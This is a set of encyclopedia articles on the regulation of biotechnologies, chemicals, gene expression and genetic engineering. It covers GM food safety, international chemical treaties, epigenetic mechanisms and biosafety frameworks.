Genetically modified foods are foods produced from organisms that have had specific changes introduced into their DNA with the methods of genetic engineering . These techniques have allowed for the introduction of new crop traits as well as a far greater control over a food's genetic structure than previously afforded by methods such as selective breeding and mutation breeding . [ 66 ] Commercial sale of genetically modified foods began in 1994, when Calgene first marketed its Flavr Savr delayed ripening tomato. [ 67 ] To date most genetic modification of foods have primarily focused on cash crops in high demand by farmers such as soybean , corn , canola , and cotton seed oil . These have been engineered for resistance to pathogens and herbicides and better nutrient profiles. GM livestock have also been experimentally developed; in November 2013 none were available on the market, [ 68 ] but in 2015 the FDA approved the first GM salmon for commercial production and consumption. [ 69 ]
There is a scientific consensus [ 70 ] [ 71 ] [ 72 ] [ 73 ] that currently available food derived from GM crops poses no greater risk to human health than conventional food, [ 74 ] [ 75 ] [ 76 ] [ 77 ] [ 78 ] but that each GM food needs to be tested on a case-by-case basis before introduction. [ 79 ] [ 80 ] [ 81 ] Nonetheless, members of the public are much less likely than scientists to perceive GM foods as safe. [ 82 ] [ 83 ] [ 84 ] [ 85 ] The legal and regulatory status of GM foods varies by country, with some nations banning or restricting them, and others permitting them with widely differing degrees of regulation. [ 86 ] [ 87 ] [ 88 ] [ 89 ]
GM crops also provide a number of ecological benefits, if not used in excess. [ 90 ] Insect-resistant crops have proven to lower pesticide usage, therefore reducing the environmental impact of pesticides as a whole. [ 91 ] However, opponents have objected to GM crops per se on several grounds, including environmental concerns, whether food produced from GM crops is safe, whether GM crops are needed to address the world's food needs, and economic concerns raised by the fact these organisms are subject to intellectual property law.
Biotechnology has several applications in the realm of food security. Crops like Golden rice are engineered to have higher nutritional content, and there is potential for food products with longer shelf lives. [ 92 ] Though not a form of agricultural biotechnology, vaccines can help prevent diseases found in animal agriculture. Additionally, agricultural biotechnology can expedite breeding processes in order to yield faster results and provide greater quantities of food. [ 93 ] Transgenic biofortification in cereals has been considered as a promising method to combat malnutrition in India and other countries. [ 94 ]
Industrial biotechnology (known mainly in Europe as white biotechnology) is the application of biotechnology for industrial purposes, including industrial fermentation . It includes the practice of using cells such as microorganisms , or components of cells like enzymes , to generate industrially useful products in sectors such as chemicals, food and feed, detergents, paper and pulp, textiles and biofuels . [ 95 ] In the current decades, significant progress has been done in creating genetically modified organisms (GMOs) that enhance the diversity of applications and economical viability of industrial biotechnology. By using renewable raw materials to produce a variety of chemicals and fuels, industrial biotechnology is actively advancing towards lowering greenhouse gas emissions and moving away from a petrochemical-based economy. [ 96 ]
Synthetic biology is considered one of the essential cornerstones in industrial biotechnology due to its financial and sustainable contribution to the manufacturing sector. Jointly biotechnology and synthetic biology play a crucial role in generating cost-effective products with nature-friendly features by using bio-based production instead of fossil-based. [ 97 ] Synthetic biology can be used to engineer model microorganisms , such as Escherichia coli , by genome editing tools to enhance their ability to produce bio-based products, such as bioproduction of medicines and biofuels . [ 98 ] For instance, E. coli and Saccharomyces cerevisiae in a consortium could be used as industrial microbes to produce precursors of the chemotherapeutic agent paclitaxel by applying the metabolic engineering in a co-culture approach to exploit the benefits from the two microbes. [ 99 ]
Another example of synthetic biology applications in industrial biotechnology is the re-engineering of the metabolic pathways of E. coli by CRISPR and CRISPRi systems toward the production of a chemical known as 1,4-butanediol , which is used in fiber manufacturing. In order to produce 1,4-butanediol, the authors alter the metabolic regulation of the Escherichia coli by CRISPR to induce point mutation in the glt A gene, knockout of the sad gene, and knock-in six genes ( cat 1, suc D, 4hbd , cat 2, bld , and bdh ). Whereas CRISPRi system used to knockdown the three competing genes ( gab D, ybg C, and tes B) that affect the biosynthesis pathway of 1,4-butanediol. Consequently, the yield of 1,4-butanediol significantly increased from 0.9 to 1.8 g/L. [ 100 ]
Environmental biotechnology includes various disciplines that play an essential role in reducing environmental waste and providing environmentally safe processes, such as biofiltration and biodegradation . [ 101 ] [ 102 ] The environment can be affected by biotechnologies, both positively and adversely. Vallero and others have argued that the difference between beneficial biotechnology (e.g., bioremediation is to clean up an oil spill or hazard chemical leak) versus the adverse effects stemming from biotechnological enterprises (e.g., flow of genetic material from transgenic organisms into wild strains) can be seen as applications and implications, respectively. [ 103 ] Cleaning up environmental wastes is an example of an application of environmental biotechnology ; whereas loss of biodiversity or loss of containment of a harmful microbe are examples of environmental implications of biotechnology. [ citation needed ]
Many cities have installed CityTrees , which use biotechnology to filter pollutants from urban atmospheres. [ 104 ]
The regulation of genetic engineering concerns approaches taken by governments to assess and manage the risks associated with the use of genetic engineering technology, and the development and release of genetically modified organisms (GMO), including genetically modified crops and genetically modified fish . There are differences in the regulation of GMOs between countries, with some of the most marked differences occurring between the US and Europe. [ 105 ] [ 106 ] Regulation varies in a given country depending on the intended use of the products of the genetic engineering. For example, a crop not intended for food use is generally not reviewed by authorities responsible for food safety. [ 107 ] The European Union differentiates between approval for cultivation within the EU and approval for import and processing. While only a few GMOs have been approved for cultivation in the EU a number of GMOs have been approved for import and processing. [ 108 ] The cultivation of GMOs has triggered a debate about the coexistence of GM and non-GM crops. Depending on the coexistence regulations, incentives for the cultivation of GM crops differ. [ 109 ]
The EUginius (European GMO Initiative for a Unified Database System) database is intended to help companies, interested private users and competent authorities to find precise information on the presence, detection and identification of GMOs used in the European Union . The information is provided in English. [ citation needed ]
In 1988, after prompting from the United States Congress , the National Institute of General Medical Sciences ( National Institutes of Health ) (NIGMS) instituted a funding mechanism for biotechnology training. Universities nationwide compete for these funds to establish Biotechnology Training Programs (BTPs). Each successful application is generally funded for five years then must be competitively renewed. Graduate students in turn compete for acceptance into a BTP; if accepted, then stipend, tuition and health insurance support are provided for two or three years during the course of their PhD thesis work. Nineteen institutions offer NIGMS supported BTPs. [ 110 ] Biotechnology training is also offered at the undergraduate level and in community colleges. [ citation needed ]
But see also:
Domingo, José L.; Bordonaba, Jordi Giné (2011). "A literature review on the safety assessment of genetically modified plants" (PDF) . Environment International . 37 (4): 734– 742. Bibcode : 2011EnInt..37..734D . doi : 10.1016/j.envint.2011.01.003 . PMID 21296423 . Archived (PDF) from the original on October 9, 2022. In spite of this, the number of studies specifically focused on safety assessment of GM plants is still limited. However, it is important to remark that for the first time, a certain equilibrium in the number of research groups suggesting, on the basis of their studies, that a number of varieties of GM products (mainly maize and soybeans) are as safe and nutritious as the respective conventional non-GM plant, and those raising still serious concerns, was observed. Moreover, it is worth mentioning that most of the studies demonstrating that GM foods are as nutritional and safe as those obtained by conventional breeding, have been performed by biotechnology companies or associates, which are also responsible of commercializing these GM plants. Anyhow, this represents a notable advance in comparison with the lack of studies published in recent years in scientific journals by those companies.
Krimsky, Sheldon (2015). "An Illusory Consensus behind GMO Health Assessment". Science, Technology, & Human Values . 40 (6): 883– 914. doi : 10.1177/0162243915598381 . S2CID 40855100 . I began this article with the testimonials from respected scientists that there is literally no scientific controversy over the health effects of GMOs. My investigation into the scientific literature tells another story.
And contrast:
Panchin, Alexander Y.; Tuzhikov, Alexander I. (January 14, 2016). "Published GMO studies find no evidence of harm when corrected for multiple comparisons". Critical Reviews in Biotechnology . 37 (2): 213– 217. doi : 10.3109/07388551.2015.1130684 . ISSN 0738-8551 . PMID 26767435 . S2CID 11786594 . Here, we show that a number of articles some of which have strongly and negatively influenced the public opinion on GM crops and even provoked political actions, such as GMO embargo, share common flaws in the statistical evaluation of the data. Having accounted for these flaws, we conclude that the data presented in these articles does not provide any substantial evidence of GMO harm. The presented articles suggesting possible harm of GMOs received high public attention. However, despite their claims, they actually weaken the evidence for the harm and lack of substantial equivalency of studied GMOs. We emphasize that with over 1783 published articles on GMOs over the last 10 years it is expected that some of them should have reported undesired differences between GMOs and conventional crops even if no such differences exist in reality.
and | https://en.wikipedia.org/wiki/Regulation_of_biotechnologies |
The regulation of chemicals is the legislative intent of a variety of national laws or international initiatives such as agreements, strategies or conventions . These international initiatives define the policy of further regulations to be implemented locally as well as exposure or emission limits. Often, regulatory agencies oversee the enforcement of these laws.
Chemicals are regulated for:
Strategic Approach to International Chemicals Management ( SAICM ) -. [ 1 ] This initiative was adopted at the International Conference on Chemicals Management (ICCM), which took place from 4–6 February 2006 in Dubai gathering Governments and intergovernmental and non-governmental organizations. It defines a policy framework to foster the sound worldwide management of chemicals.
This initiative covers risk assessments of chemicals and harmonized labeling up to tackling obsolete and stockpiled products. Are included provisions for national centers aimed at helping in the developing world, training staff in chemical safety as well as dealing with spills and accidents. SAICM is a voluntary agreement.
A second International Conference on Chemicals Management -ICCM2- held in May 2009 in Geneva took place to enhance synergies and cost-effectiveness and to promote SAICM’s multi-sectorial nature.
Globally Harmonized System of Classification and Labeling of Chemicals (GHS)[ [ 2 ] ]
The “ Globally Harmonized System of Classification and Labelling of Chemicals ” (GHS) proposes harmonized hazard communication elements, including labels and safety data sheets. It was adopted by the United Nations Economic Commission for Europe (UNECE) in 2002. This system aims to ensure a better protection of human health and the environment during the handling of chemicals, including their transport and use. The classification of chemicals is done based on their hazard. This harmonization will facilitate trade when implemented entirely.
Stockholm Convention [1] -
The Stockholm Convention is a global treaty to protect human health and the environment from persistent organic pollutants (POPs). It entered into force, on 17 May 2004, and over 150 countries signed the Convention. In May 2009, nine new chemicals are proposed for listing which then contained 12 substances.
Rotterdam Convention [ 3 ] –
The objectives of the Rotterdam Convention are:
The text of the Convention was adopted on 10 September 1998 by a Conference in Rotterdam, the Netherlands. The Convention entered into force on 24 February 2004. The Convention creates legally binding obligations for the implementation of the Prior Informed Consent (PIC) procedure.
Basel Convention [ 4 ] –
The Basel Convention on the Control of Trans-boundary Movements of Hazardous Wastes and their Disposal is a global environmental agreement on hazardous and other wastes. It came into force in 1992. The Convention has 172 Parties and aims to protect human health and the environment against the adverse effects resulting from the generation, management, transboundary movements and disposal of hazardous and other wastes.
Montreal Protocol [ 5 ] [ 6 ] – The Montreal Protocol was a globally coordinated regulatory action that sought to regulate ozone-depleting chemicals. 191 countries have ratified the treaty.
Global Framework on Chemicals -
The plan was adopted on 30 September 2023 in Bonn at the fifth session of the International Conference on Chemicals Management organized by the UN Environment Programme (UNEP). [ 7 ]
USA : [ 8 ] The Environmental Protection Agency (EPA) of the US announced in 2009 that the chemicals management laws would be strengthened, and that it would initiate a comprehensive approach to enhance the chemicals management program, including:
Chemicals are regulated under various laws including the Toxic Substances Control Act (TSCA). In 2010, Congress was considering a new law entitled the Safe Chemicals Act . [ 9 ] Over the following several years, the Senate considered a number of legislative texts to amend the TSCA. These included the Safer Chemicals Act , several versions of which were introduced by Senator Frank Lautenberg (D-NJ), with the latest in 2013, and the Chemical Safety Improvement Act (S. 1009, CSIA) introduced by Senators Lautenberg and David Vitter (R-LA) in 2013. Senator Lautenberg died shortly after CSIA's introduction, and over time his mantle was picked up by Senator Tom Udall (D-NM), who continued to work with Senator Vitter on revisions to the CSIA. The result of that effort was the Frank R. Lautenberg Chemical Safety for the 21st Century Act , passed by the Senate on December 17, 2015. The Toxic Substances Control Act (TSCA) Modernization Act of 2015 (H.R. 2576), passed the House of Representatives on June 23, 2015. [ 10 ] Revised legislation, which resolved differences between the House and Senate versions, was forwarded to the President on June 14, 2016. [ 11 ] President Obama signed the bill into law on June 22, 2016. The Senator's widow, Bonnie Lautenberg, was present at the White House signing ceremony. [ 12 ]
EU : Chemicals in Europe are managed by the REACH [ 13 ] [ 14 ] (Registration, Evaluation and Authorization and Restriction of Chemicals) and the CLP [ 15 ] (Classification, Labeling and Packaging) regulations. Specific regulations exist for specific families of products such as Fertilizers, Detergents, Explosives, Pyrotechnic Articles, Drug Precursors. [ 16 ]
Canada : In Canada, the Chemicals Management Plan [ 17 ] is responsible for designating priority chemicals, gathering public information about those chemicals, and generating risk assessment and management strategies.
A study suggests and defines a ' planetary boundary ' for novel entities such as plastic - and chemical pollution and concluded that it has been crossed, suggesting – alongside many other studies and indicators – that more and improved regulations or related changes (e.g. enforcement- or trade-related changes) are necessary. [ 18 ] [ 19 ]
Using drug discovery artificial intelligence algorithms, researchers generated 40,000 potential chemical weapon candidates, [ 20 ] [ 21 ] which may be relevant to timely regulation of chemicals and related products that can be used to manufacture the fraction of viable candidates. [ citation needed ] According to a senior scientist author of the study, synthesizing these chemicals for real harm would be the more difficult part and certain needed molecules for doing so are known and regulated – however, some viable candidates may only require currently non-regulated compounds. [ 22 ]
Other issues include: | https://en.wikipedia.org/wiki/Regulation_of_chemicals |
Regulation of gene expression , or gene regulation , [ 1 ] includes a wide range of mechanisms that are used by cells to increase or decrease the production of specific gene products ( protein or RNA ). Sophisticated programs of gene expression are widely observed in biology, for example to trigger developmental pathways, respond to environmental stimuli, or adapt to new food sources. Virtually any step of gene expression can be modulated, from transcriptional initiation , to RNA processing , and to the post-translational modification of a protein. Often, one gene regulator controls another, and so on, in a gene regulatory network .
Gene regulation is essential for viruses , prokaryotes and eukaryotes as it increases the versatility and adaptability of an organism by allowing the cell to express protein when needed. Although as early as 1951, Barbara McClintock showed interaction between two genetic loci, Activator ( Ac ) and Dissociator ( Ds ), in the color formation of maize seeds, the first discovery of a gene regulation system is widely considered to be the identification in 1961 of the lac operon , discovered by François Jacob and Jacques Monod , in which some enzymes involved in lactose metabolism are expressed by E. coli only in the presence of lactose and absence of glucose.
In multicellular organisms, gene regulation drives cellular differentiation and morphogenesis in the embryo, leading to the creation of different cell types that possess different gene expression profiles from the same genome sequence. Although this does not explain how gene regulation originated, evolutionary biologists include it as a partial explanation of how evolution works at a molecular level , and it is central to the science of evolutionary developmental biology ("evo-devo").
Any step of gene expression may be modulated, from signaling to transcription to post-translational modification of a protein. The following is a list of stages where gene expression is regulated, where the most extensively utilized point is transcription initiation, the first stage in transcription: [ citation needed ]
In eukaryotes, the accessibility of large regions of DNA can depend on its chromatin structure, which can be altered as a result of histone modifications directed by DNA methylation , ncRNA , or DNA-binding protein . Hence these modifications may up or down regulate the expression of a gene. Some of these modifications that regulate gene expression are inheritable and are referred to as epigenetic regulation . [ citation needed ]
Transcription of DNA is dictated by its structure. In general, the density of its packing is indicative of the frequency of transcription. Octameric protein complexes called histones together with a segment of DNA wound around the eight histone proteins (together referred to as a nucleosome) are responsible for the amount of supercoiling of DNA, and these complexes can be temporarily modified by processes such as phosphorylation or more permanently modified by processes such as methylation . Such modifications are considered to be responsible for more or less permanent changes in gene expression levels. [ 2 ]
Methylation of DNA is a common method of gene silencing. DNA is typically methylated by methyltransferase enzymes on cytosine nucleotides in a CpG dinucleotide sequence (also called " CpG islands " when densely clustered). Analysis of the pattern of methylation in a given region of DNA (which can be a promoter) can be achieved through a method called bisulfite mapping. Methylated cytosine residues are unchanged by the treatment, whereas unmethylated ones are changed to uracil. The differences are analyzed by DNA sequencing or by methods developed to quantify SNPs, such as Pyrosequencing ( Biotage ) or MassArray ( Sequenom ), measuring the relative amounts of C/T at the CG dinucleotide. Abnormal methylation patterns are thought to be involved in oncogenesis. [ 3 ]
Histone acetylation is also an important process in transcription. Histone acetyltransferase enzymes (HATs) such as CREB-binding protein also dissociate the DNA from the histone complex, allowing transcription to proceed. Often, DNA methylation and histone deacetylation work together in gene silencing . The combination of the two seems to be a signal for DNA to be packed more densely, lowering gene expression. [ citation needed ]
Regulation of transcription thus controls when transcription occurs and how much RNA is created. Transcription of a gene by RNA polymerase can be regulated by several mechanisms. Specificity factors alter the specificity of RNA polymerase for a given promoter or set of promoters, making it more or less likely to bind to them (i.e., sigma factors used in prokaryotic transcription ). Repressors bind to the Operator , coding sequences on the DNA strand that are close to or overlapping the promoter region, impeding RNA polymerase's progress along the strand, thus impeding the expression of the gene. The image to the right demonstrates regulation by a repressor in the lac operon. General transcription factors position RNA polymerase at the start of a protein-coding sequence and then release the polymerase to transcribe the mRNA. Activators enhance the interaction between RNA polymerase and a particular promoter , encouraging the expression of the gene. Activators do this by increasing the attraction of RNA polymerase for the promoter, through interactions with subunits of the RNA polymerase or indirectly by changing the structure of the DNA. Enhancers are sites on the DNA helix that are bound by activators in order to loop the DNA bringing a specific promoter to the initiation complex. Enhancers are much more common in eukaryotes than prokaryotes, where only a few examples exist (to date). [ 4 ] Silencers are regions of DNA sequences that, when bound by particular transcription factors, can silence expression of the gene.
RNA can be an important regulator of gene activity, e.g. by microRNA (miRNA), antisense-RNA , or long non-coding RNA (lncRNA). LncRNAs differ from mRNAs in the sense that they have specified subcellular locations and functions. They were first discovered to be located in the nucleus and chromatin , and the localizations and functions are highly diverse now. Some still reside in chromatin where they interact with proteins. While this lncRNA ultimately affects gene expression in neuronal disorders such as Parkinson , Huntington , and Alzheimer disease , others, such as, PNCTR(pyrimidine-rich non-coding transcriptors), play a role in lung cancer . Given their role in disease, lncRNAs are potential biomarkers and may be useful targets for drugs or gene therapy , although there are no approved drugs that target lncRNAs yet. The number of lncRNAs in the human genome remains poorly defined, but some estimates range from 16,000 to 100,000 lnc genes. [ 5 ]
Epigenetics refers to the modification of genes that is not changing the DNA or RNA sequence. Epigenetic modifications are also a key factor in influencing gene expression . They occur on genomic DNA and histones and their chemical modifications regulate gene expression in a more efficient manner. There are several modifications of DNA (usually methylation ) and more than 100 modifications of RNA in mammalian cells.” Those modifications result in altered protein binding to DNA and a change in RNA stability and translation efficiency . [ 6 ]
In vertebrates, the majority of gene promoters contain a CpG island with numerous CpG sites . [ 7 ] When many of a gene's promoter CpG sites are methylated the gene becomes silenced. [ 8 ] Colorectal cancers typically have 3 to 6 driver mutations and 33 to 66 hitchhiker or passenger mutations. [ 9 ] However, transcriptional silencing may be of more importance than mutation in causing progression to cancer. For example, in colorectal cancers about 600 to 800 genes are transcriptionally silenced by CpG island methylation (see regulation of transcription in cancer ). Transcriptional repression in cancer can also occur by other epigenetic mechanisms, such as altered expression of microRNAs . [ 10 ] In breast cancer, transcriptional repression of BRCA1 may occur more frequently by over-expressed microRNA-182 than by hypermethylation of the BRCA1 promoter (see Low expression of BRCA1 in breast and ovarian cancers ).
One of the cardinal features of addiction is its persistence. The persistent behavioral changes appear to be due to long-lasting changes, resulting from epigenetic alterations affecting gene expression, within particular regions of the brain. [ 11 ] Drugs of abuse cause three types of epigenetic alteration in the brain. These are (1) histone acetylations and histone methylations , (2) DNA methylation at CpG sites , and (3) epigenetic downregulation or upregulation of microRNAs . [ 11 ] [ 12 ] (See Epigenetics of cocaine addiction for some details.)
Chronic nicotine intake in mice alters brain cell epigenetic control of gene expression through acetylation of histones . This increases expression in the brain of the protein FosB, important in addiction. [ 13 ] Cigarette addiction was also studied in about 16,000 humans, including never smokers, current smokers, and those who had quit smoking for up to 30 years. [ 14 ] In blood cells, more than 18,000 CpG sites (of the roughly 450,000 analyzed CpG sites in the genome) had frequently altered methylation among current smokers. These CpG sites occurred in over 7,000 genes, or roughly a third of known human genes. The majority of the differentially methylated CpG sites returned to the level of never-smokers within five years of smoking cessation. However, 2,568 CpGs among 942 genes remained differentially methylated in former versus never smokers. Such remaining epigenetic changes can be viewed as “molecular scars” [ 12 ] that may affect gene expression.
In rodent models, drugs of abuse, including cocaine, [ 15 ] methamphetamine, [ 16 ] [ 17 ] alcohol [ 18 ] and tobacco smoke products, [ 19 ] all cause DNA damage in the brain. During repair of DNA damages some individual repair events can alter the methylation of DNA and/or the acetylations or methylations of histones at the sites of damage, and thus can contribute to leaving an epigenetic scar on chromatin. [ 20 ]
Such epigenetic scars likely contribute to the persistent epigenetic changes found in addiction.
In mammals, methylation of cytosine (see Figure) in DNA is a major regulatory mediator. Methylated cytosines primarily occur in dinucleotide sequences where cytosine is followed by a guanine, a CpG site . The total number of CpG sites in the human genome is approximately 28 million. [ 21 ] and generally about 70% of all CpG sites have a methylated cytosine. [ 22 ]
In a rat, a painful learning experience, contextual fear conditioning , can result in a life-long fearful memory after a single training event. [ 23 ] Cytosine methylation is altered in the promoter regions of about 9.17% of all genes in the hippocampus neuron DNA of a rat that has been subjected to a brief fear conditioning experience. [ 24 ] The hippocampus is where new memories are initially stored.
Methylation of CpGs in a promoter region of a gene represses transcription [ 25 ] while methylation of CpGs in the body of a gene increases expression. [ 26 ] TET enzymes play a central role in demethylation of methylated cytosines. Demethylation of CpGs in a gene promoter by TET enzyme activity increases transcription of the gene. [ 27 ]
When contextual fear conditioning is applied to a rat, more than 5,000 differentially methylated regions (DMRs) (of 500 nucleotides each) occur in the rat hippocampus neural genome both one hour and 24 hours after the conditioning in the hippocampus. [ 24 ] This causes about 500 genes to be up-regulated (often due to demethylation of CpG sites in a promoter region) and about 1,000 genes to be down-regulated (often due to newly formed 5-methylcytosine at CpG sites in a promoter region). The pattern of induced and repressed genes within neurons appears to provide a molecular basis for forming the first transient memory of this training event in the hippocampus of the rat brain. [ 24 ]
After the DNA is transcribed and mRNA is formed, there must be some sort of regulation on how much the mRNA is translated into proteins. Cells do this by modulating the capping, splicing, addition of a Poly(A) Tail, the sequence-specific nuclear export rates, and, in several contexts, sequestration of the RNA transcript. These processes occur in eukaryotes but not in prokaryotes. This modulation is a result of a protein or transcript that, in turn, is regulated and may have an affinity for certain sequences.
Three prime untranslated regions (3'-UTRs) of messenger RNAs (mRNAs) often contain regulatory sequences that post-transcriptionally influence gene expression. [ 28 ] Such 3'-UTRs often contain both binding sites for microRNAs (miRNAs) as well as for regulatory proteins. By binding to specific sites within the 3'-UTR, miRNAs can decrease gene expression of various mRNAs by either inhibiting translation or directly causing degradation of the transcript. The 3'-UTR also may have silencer regions that bind repressor proteins that inhibit the expression of a mRNA.
The 3'-UTR often contains miRNA response elements (MREs) . MREs are sequences to which miRNAs bind. These are prevalent motifs within 3'-UTRs. Among all regulatory motifs within the 3'-UTRs (e.g. including silencer regions), MREs make up about half of the motifs.
As of 2014, the miRBase web site, [ 29 ] an archive of miRNA sequences and annotations, listed 28,645 entries in 233 biologic species. Of these, 1,881 miRNAs were in annotated human miRNA loci. miRNAs were predicted to have an average of about four hundred target mRNAs (affecting expression of several hundred genes). [ 30 ] Freidman et al. [ 30 ] estimate that >45,000 miRNA target sites within human mRNA 3'-UTRs are conserved above background levels, and >60% of human protein-coding genes have been under selective pressure to maintain pairing to miRNAs.
Direct experiments show that a single miRNA can reduce the stability of hundreds of unique mRNAs. [ 31 ] Other experiments show that a single miRNA may repress the production of hundreds of proteins, but that this repression often is relatively mild (less than 2-fold). [ 32 ] [ 33 ]
The effects of miRNA dysregulation of gene expression seem to be important in cancer. [ 34 ] For instance, in gastrointestinal cancers, a 2015 paper identified nine miRNAs as epigenetically altered and effective in down-regulating DNA repair enzymes. [ 35 ]
The effects of miRNA dysregulation of gene expression also seem to be important in neuropsychiatric disorders, such as schizophrenia , bipolar disorder , major depressive disorder , Parkinson's disease , Alzheimer's disease and autism spectrum disorders. [ 36 ] [ 37 ] [ 38 ]
The translation of mRNA can also be controlled by a number of mechanisms, mostly at the level of initiation. Recruitment of the small ribosomal subunit can indeed be modulated by mRNA secondary structure, antisense RNA binding, or protein binding. In both prokaryotes and eukaryotes, a large number of RNA binding proteins exist, which often are directed to their target sequence by the secondary structure of the transcript, which may change depending on certain conditions, such as temperature or presence of a ligand (aptamer). Some transcripts act as ribozymes and self-regulate their expression.
A large number of studied regulatory systems come from developmental biology . Examples include:
Up-regulation is a process which occurs within a cell triggered by a signal (originating internal or external to the cell), which results in increased expression of one or more genes and as a result the proteins encoded by those genes. Conversely, down-regulation is a process resulting in decreased gene and corresponding protein expression.
Gene Regulation can be summarized by the response of the respective system:
The GAL4/UAS system is an example of both an inducible and repressible system. Gal4 binds an upstream activation sequence (UAS) to activate the transcription of the GAL1/GAL7/GAL10 cassette. On the other hand, a MIG1 response to the presence of glucose can inhibit GAL4 and therefore stop the expression of the GAL1/GAL7/GAL10 cassette. [ 42 ]
In general, most experiments investigating differential expression used whole cell extracts of RNA, called steady-state levels, to determine which genes changed and by how much. These are, however, not informative of where the regulation has occurred and may mask conflicting regulatory processes ( see post-transcriptional regulation ), but it is still the most commonly analysed ( quantitative PCR and DNA microarray ).
When studying gene expression, there are several methods to look at the various stages. In eukaryotes these include: | https://en.wikipedia.org/wiki/Regulation_of_gene_expression |
The regulation of genetic engineering varies widely by country. Countries such as the United States, Canada, Lebanon and Egypt use substantial equivalence as the starting point when assessing safety, while many countries such as those in the European Union, Brazil and China authorize GMO cultivation on a case-by-case basis. Many countries allow the import of GM food with authorization, but either do not allow its cultivation (Russia, Norway, Israel) or have provisions for cultivation, but no GM products are yet produced (Japan, South Korea). Most countries that do not allow for GMO cultivation do permit research. [ 2 ] Most (85%) of the world's GMO crops are grown in the Americas (North and South). [ 1 ] One of the key issues concerning regulators is whether GM products should be labeled. Labeling of GMO products in the marketplace is required in 64 countries. [ 3 ] Labeling can be mandatory up to a threshold GM content level (which varies between countries) or voluntary. A study investigating voluntary labeling in South Africa found that 31% of products labeled as GMO-free had a GM content above 1.0%. [ 4 ] In Canada and the US labeling of GM food is voluntary, [ 5 ] while in Europe all food (including processed food ) or feed which contains greater than 0.9% of approved GMOs must be labelled. [ 6 ] [ 7 ]
There is a scientific consensus [ 8 ] [ 9 ] [ 10 ] [ 11 ] that currently available food derived from GM crops poses no greater risk to human health than conventional food, [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] but that each GM food needs to be tested on a case-by-case basis before introduction. [ 17 ] [ 18 ] [ 19 ] Nonetheless, members of the public are much less likely than scientists to perceive GM foods as safe. [ 20 ] [ 21 ] [ 22 ] [ 23 ] The legal and regulatory status of GM foods varies by country, with some nations banning or restricting them, and others permitting them with widely differing degrees of regulation. [ 24 ] [ 25 ] [ 26 ] [ 27 ]
There is no evidence to support the idea that the consumption of approved GM food has a detrimental effect on human health. [ 28 ] [ 29 ] [ 30 ] Some scientists and advocacy groups, such as Greenpeace and World Wildlife Fund , have however called for additional and more rigorous testing for GM food. [ 29 ]
The development of a regulatory framework concerning genetic engineering began in 1975, at Asilomar , California. The first use of Recombinant DNA (rDNA) technology had just been successfully accomplished by Stanley Cohen and Herbert Boyer two years previously and the scientific community recognized that as well as benefits this technology could also pose some risks. [ 31 ] The Asilomar meeting recommended a set of guidelines regarding the cautious use of recombinant technology and any products resulting from that technology. [ 32 ] The Asilomar recommendations were voluntary, but in 1976 the US National Institute of Health (NIH) formed a rDNA advisory committee. [ 33 ] This was followed by other regulatory offices (the United States Department of Agriculture (USDA), Environmental Protection Agency (EPA) and Food and Drug Administration (FDA)), effectively making all rDNA research tightly regulated in the US. [ 34 ]
In 1982 the Organisation for Economic Co-operation and Development (OECD) released a report into the potential hazards of releasing genetically modified organisms (GMOs) into the environment as the first transgenic plants were being developed. [ 35 ] As the technology improved and genetically organisms moved from model organisms to potential commercial products the US established a committee at the Office of Science and Technology (OSTP) to develop mechanisms to regulate the developing technology. [ 34 ] In 1986 the OSTP assigned regulatory approval of genetically modified plants in the US to the USDA, FDA and EPA. [ 36 ]
The basic concepts for the safety assessment of foods derived from GMOs have been developed in close collaboration under the auspices of the OECD , the World Health Organization (WHO) and Food and Agriculture Organization (FAO). A first joint FAO/WHO consultation in 1990 resulted in the publication of the report ‘Strategies for Assessing the Safety of Foods Produced by Biotechnology’ in 1991. [ 37 ] Building on that, an international consensus was reached by the OECD's Group of National Experts on Safety in Biotechnology, for assessing biotechnology in general, including field testing GM crops. [ 38 ] That Group met again in Bergen, Norway in 1992 and reached consensus on principles for evaluating the safety of GM food; its report, ‘The safety evaluation of foods derived by modern technology – concepts and principles’ was published in 1993. [ 39 ] That report recommends conducting the safety assessment of a GM food on a case-by-case basis through comparison to an existing food with a long history of safe use. This basic concept has been refined in subsequent workshops and consultations organized by the OECD, WHO, and FAO, and the OECD in particular has taken the lead in acquiring data and developing standards for conventional foods to be used in assessing substantial equivalence . [ 40 ] [ 41 ]
The Cartagena Protocol on Biosafety was adopted on 29 January 2000 and entered into force on 11 September 2003. [ 42 ] It is an international treaty that governs the transfer, handling, and use of genetically modified (GM) organisms. It is focused on movement of GMOs between countries and has been called a de facto trade agreement. [ 43 ] One hundred and seventy-two countries [ 44 ] are members of the Protocol and many use it as a reference point for their own regulations. [ 45 ] Also in 2003 the Codex Alimentarius Commission of the FAO/WHO adopted a set of "Principles and Guidelines on foods derived from biotechnology" to help countries coordinate and standardize regulation of GM food to help ensure public safety and facilitate international trade. [ 46 ] and updated its guidelines for import and export of food in 2004, [ 47 ]
The European Union first introduced laws requiring GMOs to be labelled in 1997. [ 48 ] In 2013, Connecticut became the first state to enact a labeling law in the US, although it would not take effect until other states followed suit. [ 49 ]
Institutions that conduct certain types of scientific research must obtain permission from government authorities and ethical committees before they conduct any experiments. Universities and research institutes generally have a special committee that is responsible for approving any experiments that involve genetic engineering . Many experiments also need permission from a national regulatory group or legislation. All staff must be trained in the use of GMOs and in some laboratories a biological control safety officer is appointed. All laboratories must gain approval from their regulatory agency to work with GMOs and all experiments must be documented. [ 50 ] As of 2008 there have been no major accidents with GMOs in the lab. [ 51 ]
The legislation covering GMOs was initially covered by adapting existing regulations in place for chemicals or other purposes, with many countries later developing specific policies aimed at genetic engineering. [ 52 ] These are often derived from regulations and guidelines in place for the non-GMO version of the organism, although they are more severe. In many countries now the regulations are diverging, even though many of the risks and procedures are similar. Sometimes even different agencies are responsible, notably in the Netherlands where the Ministry of the Environment covers GMOs and the Ministry of Social Affairs covers the human pathogens they are derived from. [ 51 ]
There is a near universal system for assessing the relative risks associated with GMOs and other agents to laboratory staff and the community. They are then assigned to one of four risk categories based on their virulence, the severity of disease, the mode of transmission, and the availability of preventive measures or treatments. There are some differences in how these categories are defined, such as the World Health Organisation (WHO) including dangers to animals and the environment in their assessments. When there are varying levels of virulence the regulators base their classification on the highest. Accordingly, there are four biosafety levels that a laboratory can fall into, ranging from level 1 (which is suitable for working with agents not associated with disease) to level 4 (working with life-threatening agents). Different countries use different nomenclature to describe the levels and can have different requirements for what can be done at each level. [ 51 ]
